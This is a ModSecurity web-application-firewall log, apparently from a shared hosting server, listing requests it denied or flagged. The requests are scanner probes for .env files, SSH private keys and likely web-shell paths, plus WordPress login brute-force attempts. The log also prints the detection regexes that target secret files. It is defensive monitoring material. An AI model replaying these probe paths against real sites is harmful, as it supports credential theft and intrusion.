[Tue May 26 20:02:51.273085 2026] [security2:error] [pid 113091:tid 113294] [client 194.26.192.219:65274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "md-74.webhostbox.net"] [uri "/ctnqvcsy.php"] [unique_id "ahWvE6PxBGSmlFNOy6pIRwAAAl0"], referer: www.google.com
[Tue May 26 20:02:51.571208 2026] [security2:error] [pid 113091:tid 113313] [client 103.125.146.82:34985] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/network/cache/classwithtostring.php"] [unique_id "ahWvE6PxBGSmlFNOy6pITQAAAnA"]
[Tue May 26 20:02:52.030730 2026] [security2:error] [pid 112029:tid 112190] [client 5.255.113.213:36482] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/backend/.env"] [unique_id "ahWvFKFW0C-ajaCsyFdB6AAAASk"]
[Tue May 26 20:02:52.030880 2026] [security2:error] [pid 106517:tid 106778] [client 5.255.113.213:36514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/.ssh/id_dsa"] [unique_id "ahWvFIZZc2DoU1lPnP16YwAAAQQ"]
[Tue May 26 20:02:52.031120 2026] [security2:error] [pid 106517:tid 106659] [client 5.255.113.213:36470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/api/.env"] [unique_id "ahWvFIZZc2DoU1lPnP16YgAAAI4"]
[Tue May 26 20:02:52.032509 2026] [security2:error] [pid 106517:tid 106695] [client 5.255.113.213:36510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/.ssh/id_rsa"] [unique_id "ahWvFIZZc2DoU1lPnP16agAAALE"]
[Tue May 26 20:02:52.032585 2026] [security2:error] [pid 106517:tid 106691] [client 5.255.113.213:36500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/public/.env"] [unique_id "ahWvFIZZc2DoU1lPnP16awAAAK0"]
[Tue May 26 20:02:52.036180 2026] [security2:error] [pid 112029:tid 112233] [client 5.255.113.213:36494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/app/.env"] [unique_id "ahWvFKFW0C-ajaCsyFdB7gAAAVQ"]
[Tue May 26 20:02:52.037264 2026] [security2:error] [pid 106517:tid 106715] [client 5.255.113.213:36420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/.env.bak"] [unique_id "ahWvFIZZc2DoU1lPnP16cwAAAMU"]
[Tue May 26 20:02:52.043121 2026] [security2:error] [pid 106517:tid 106711] [client 5.255.113.213:36414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/.env.backup"] [unique_id "ahWvFIZZc2DoU1lPnP16egAAAME"]
[Tue May 26 20:02:52.069890 2026] [security2:error] [pid 106517:tid 106651] [client 103.163.220.14:25619] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/elex/1.php"] [unique_id "ahWvFIZZc2DoU1lPnP16fgAAAIY"]
[Tue May 26 20:02:52.361004 2026] [security2:error] [pid 106517:tid 106660] [client 23.129.64.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvFIZZc2DoU1lPnP16hAAAj1E"], referer: https://kingsclub.in/disclaimer
[Tue May 26 20:02:52.565989 2026] [security2:error] [pid 106517:tid 106661] [client 103.163.220.8:39821] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/elex/elex.php"] [unique_id "ahWvFIZZc2DoU1lPnP16jAAAAJA"]
[Tue May 26 20:02:52.628723 2026] [security2:error] [pid 106517:tid 106698] [client 5.255.113.213:36430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/.env.old"] [unique_id "ahWvFIZZc2DoU1lPnP16kAAAALQ"]
[Tue May 26 20:02:52.631663 2026] [security2:error] [pid 106517:tid 106679] [client 5.255.113.213:36372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "d2cargo.com"] [uri "/.env"] [unique_id "ahWvFIZZc2DoU1lPnP16kgAAAKE"]
[Tue May 26 20:02:52.644552 2026] [security2:error] [pid 106517:tid 106596] [remote 38.95.35.74:41954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWvFIZZc2DoU1lPnP16igAAh0w"]
[Tue May 26 20:02:52.879591 2026] [security2:error] [pid 113091:tid 113301] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvFKPxBGSmlFNOy6pIYgAAAmQ"]
[Tue May 26 20:02:53.077603 2026] [security2:error] [pid 113091:tid 113329] [client 103.163.220.30:43047] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/maintenance.php"] [unique_id "ahWvFaPxBGSmlFNOy6pIdwAAAoA"]
[Tue May 26 20:02:53.500198 2026] [security2:error] [pid 106517:tid 106535] [remote 38.95.35.74:41954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWvFYZZc2DoU1lPnP16pQAA_g8"], referer: https://crustiesplacebakery.com.thedebateafrica.org/wp-login.php
[Tue May 26 20:02:53.580116 2026] [security2:error] [pid 113091:tid 113244] [client 103.163.220.18:59519] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/database/index.php"] [unique_id "ahWvFaPxBGSmlFNOy6pIhAAAAis"]
[Tue May 26 20:02:54.083994 2026] [security2:error] [pid 113091:tid 113253] [client 103.163.220.38:45671] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/Divi/includes/builder/feature/ajax-data/"] [unique_id "ahWvFqPxBGSmlFNOy6pIlAAAAjQ"]
[Tue May 26 20:02:54.583643 2026] [security2:error] [pid 112029:tid 112225] [client 103.163.220.23:59961] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/Divi/includes/builder/"] [unique_id "ahWvFqFW0C-ajaCsyFdCDwAAAUw"]
[Tue May 26 20:02:55.087697 2026] [security2:error] [pid 106517:tid 106736] [client 103.163.220.11:49711] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/goodbarber/models/media.php"] [unique_id "ahWvF4ZZc2DoU1lPnP16wgAAANo"]
[Tue May 26 20:02:55.300486 2026] [security2:error] [pid 106517:tid 106652] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvF4ZZc2DoU1lPnP16zAAAAIc"]
[Tue May 26 20:02:55.300824 2026] [security2:error] [pid 106517:tid 106701] [client 66.249.64.109:41063] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvF4ZZc2DoU1lPnP16wwAAALc"]
[Tue May 26 20:02:55.578143 2026] [security2:error] [pid 106517:tid 106765] [client 103.163.220.22:21137] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/dev.ndmd.kn/wp-includes/Text/231.php"] [unique_id "ahWvF4ZZc2DoU1lPnP162QAAAPc"]
[Tue May 26 20:02:55.873575 2026] [security2:error] [pid 113091:tid 113293] [client 195.154.60.83:59713] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWvF6PxBGSmlFNOy6pIqAAAAlw"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 20:02:56.069035 2026] [security2:error] [pid 106517:tid 106734] [client 103.163.220.10:48117] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/theme-compat/classwithtostring.php"] [unique_id "ahWvGIZZc2DoU1lPnP165AAAANg"]
[Tue May 26 20:02:56.108843 2026] [security2:error] [pid 112029:tid 112237] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvF6FW0C-ajaCsyFdCHAAAAVg"]
[Tue May 26 20:02:56.356069 2026] [security2:error] [pid 113091:tid 113311] [client 202.76.135.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvF6PxBGSmlFNOy6pItQAAAm4"]
[Tue May 26 20:02:56.560596 2026] [security2:error] [pid 106517:tid 106729] [client 103.163.220.6:36783] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/wp-tinymce.php"] [unique_id "ahWvGIZZc2DoU1lPnP169AAAANM"]
[Tue May 26 20:02:57.070523 2026] [security2:error] [pid 106517:tid 106675] [client 103.163.220.23:34137] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/dev.ndmd.kn/wp-includes/js/tinymce/wp-tinymce.php"] [unique_id "ahWvGYZZc2DoU1lPnP17HQAAAJ4"]
[Tue May 26 20:02:57.554768 2026] [security2:error] [pid 106517:tid 106540] [remote 78.180.151.99:46218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.151.180.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWvGYZZc2DoU1lPnP17KAAAohQ"]
[Tue May 26 20:02:57.575013 2026] [security2:error] [pid 106517:tid 106728] [client 103.163.220.11:64589] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/wppa-depot/wp-conflg.php"] [unique_id "ahWvGYZZc2DoU1lPnP17LQAAANI"]
[Tue May 26 20:02:57.833806 2026] [security2:error] [pid 106517:tid 106556] [remote 78.180.151.99:46218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.151.180.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWvGYZZc2DoU1lPnP17MwAA7CQ"], referer: https://filosha.com/wp-login.php
[Tue May 26 20:02:58.066765 2026] [security2:error] [pid 106517:tid 106748] [client 103.163.220.47:49979] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/interactivity-api/wp-conflg.php"] [unique_id "ahWvGoZZc2DoU1lPnP17PAAAAOY"]
[Tue May 26 20:02:58.382249 2026] [security2:error] [pid 106517:tid 106762] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvGoZZc2DoU1lPnP17RAAAAPQ"]
[Tue May 26 20:02:58.382618 2026] [security2:error] [pid 106517:tid 106682] [client 66.249.64.109:41063] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvGoZZc2DoU1lPnP17QgAAAKQ"]
[Tue May 26 20:02:58.569476 2026] [security2:error] [pid 112029:tid 112267] [client 103.163.220.38:28353] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/xjkuda.php"] [unique_id "ahWvGqFW0C-ajaCsyFdCNgAAAXY"]
[Tue May 26 20:02:58.603187 2026] [security2:error] [pid 106517:tid 106723] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvGoZZc2DoU1lPnP17PgAAAM0"]
[Tue May 26 20:02:58.995931 2026] [security2:error] [pid 106517:tid 106741] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvGoZZc2DoU1lPnP17VgAAAN8"]
[Tue May 26 20:02:58.995958 2026] [security2:error] [pid 106517:tid 106741] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvGoZZc2DoU1lPnP17VgAAAN8"]
[Tue May 26 20:02:58.996568 2026] [security2:error] [pid 106517:tid 106724] [client 65.109.156.37:62645] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/works/portfolio-boxed-grid/"] [unique_id "ahWvGoZZc2DoU1lPnP17UwAAAM4"]
[Tue May 26 20:02:59.087336 2026] [security2:error] [pid 106517:tid 106765] [client 103.163.220.34:34013] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/login.php"] [unique_id "ahWvG4ZZc2DoU1lPnP17WwAAAPc"]
[Tue May 26 20:02:59.330614 2026] [security2:error] [pid 106517:tid 106677] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvG4ZZc2DoU1lPnP17ZAAAAKA"]
[Tue May 26 20:02:59.330989 2026] [security2:error] [pid 106517:tid 106716] [client 66.249.64.109:41063] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvG4ZZc2DoU1lPnP17YgAAAMY"]
[Tue May 26 20:02:59.461239 2026] [security2:error] [pid 106517:tid 106744] [client 45.154.98.38:56497] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shahvishaal.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWvG4ZZc2DoU1lPnP17bQAAAOI"]
[Tue May 26 20:02:59.665831 2026] [security2:error] [pid 113091:tid 113300] [client 103.163.220.31:46353] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/duplicator-pro/ctrls/class.web.services.php"] [unique_id "ahWvG6PxBGSmlFNOy6pI7AAAAmM"]
[Tue May 26 20:02:59.837008 2026] [security2:error] [pid 106517:tid 106773] [client 147.90.234.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvG4ZZc2DoU1lPnP17cwAA_yk"], referer: https://kingsclub.in/events
[Tue May 26 20:02:59.897184 2026] [security2:error] [pid 112029:tid 112085] [remote 40.77.167.63:16317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/index.php"] [unique_id "ahWvG6FW0C-ajaCsyFdCPAABUjc"]
[Tue May 26 20:02:59.951519 2026] [security2:error] [pid 113091:tid 113249] [client 45.154.98.38:59906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWvG6PxBGSmlFNOy6pI7QAAAjA"]
[Tue May 26 20:03:00.177227 2026] [security2:error] [pid 106517:tid 106733] [client 103.163.220.34:55345] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/min.php"] [unique_id "ahWvHIZZc2DoU1lPnP17hgAAANc"]
[Tue May 26 20:03:00.686251 2026] [security2:error] [pid 106517:tid 106765] [client 103.163.220.28:47861] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/upgrade/wordpress-6.9.1-partial-0/wordpress/wp-admin/admin.php"] [unique_id "ahWvHIZZc2DoU1lPnP17mQAAAPc"]
[Tue May 26 20:03:01.059532 2026] [security2:error] [pid 113091:tid 113338] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvHKPxBGSmlFNOy6pI9QAAAok"]
[Tue May 26 20:03:01.207187 2026] [security2:error] [pid 113091:tid 113132] [remote 173.252.70.2:64788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.70.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWvHaPxBGSmlFNOy6pI-gACNyg"]
[Tue May 26 20:03:01.208546 2026] [security2:error] [pid 106517:tid 106651] [client 103.163.220.43:39595] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/upgrade/wordpress-6.9.1-partial-0/wordpress/wp-includes/home.php"] [unique_id "ahWvHYZZc2DoU1lPnP17rQAAAIY"]
[Tue May 26 20:03:01.519187 2026] [security2:error] [pid 106517:tid 106626] [remote 173.252.70.17:55684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.70.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWvHYZZc2DoU1lPnP17uAAA7mo"]
[Tue May 26 20:03:01.718929 2026] [security2:error] [pid 106517:tid 106627] [remote 173.252.70.49:43954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.70.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWvHYZZc2DoU1lPnP17vgAA6Gs"]
[Tue May 26 20:03:01.764061 2026] [security2:error] [pid 106517:tid 106752] [client 103.163.220.7:48125] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/enhanced-text-widget1/analyst/src/403x.php"] [unique_id "ahWvHYZZc2DoU1lPnP17wQAAAOo"]
